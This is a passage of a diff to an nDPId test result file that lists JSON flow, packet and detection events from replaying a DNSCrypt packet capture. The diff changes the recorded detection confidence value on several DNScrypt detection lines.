01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAIcHP1AAL0RYFkKAAABuYbEN8UDIPsCCECUfxsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAXcHP4gAL0RfJgKAAABuYbEN9dTIPsGBAJxfx4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304328} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAABQHP4Aub0RoWsKAAABuYbENwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946739304360,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739304360,"pkt":"ZmZmZmZmRERERERECABFAADWmUJAADQRblq5hsQ3CgAAASD7xQMAwuTIfxuAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAADn5TxO0FAodB0MfyNII\/q4yfvBzna8lha8rHqMZH6brB0hzmteXf96oRMNtUVCp592lxf62HHwuDSbhBbtGtQcalorpuHO8PTt\/PSXI1nToKeQ\/\/4xUAF+WFp6Iz9p9KhqWium4c7w9AAAAAV7URQBxousA"} @@ -87,24 +87,24 @@ 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946739304362,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739304362,"pkt":"ZmZmZmZmRERERERECABFAADWmUNAADQRblm5hsQ3CgAAASD70cEAwtgLfxqAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAADn5TxO0FAodB0MfyNII\/q4yfvBzna8lha8rHqMZH6brB0hzmteXf96oRMNtUVCp592lxf62HHwuDSbhBbtGtQcalorpuHO8PTt\/PSXI1nToKeQ\/\/4xUAF+WFp6Iz9p9KhqWium4c7w9AAAAAV7URQBxousA"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAIcylFAAL0RDRQKAAABaO66wK6oAbsCCOaEZFgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAXcylIgAL0RKVMKAAABaO66wN6lAbsGBMqkZFUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":42,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304363} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":42,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAABQylIAub0RTiYKAAABaO66wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAIcylNAAL0RDRIKAAABaO66wJrnAbsCCOaEZFYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAIcylVAAL0RDRAKAAABaO66wOd9AbsCCOaEZFQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA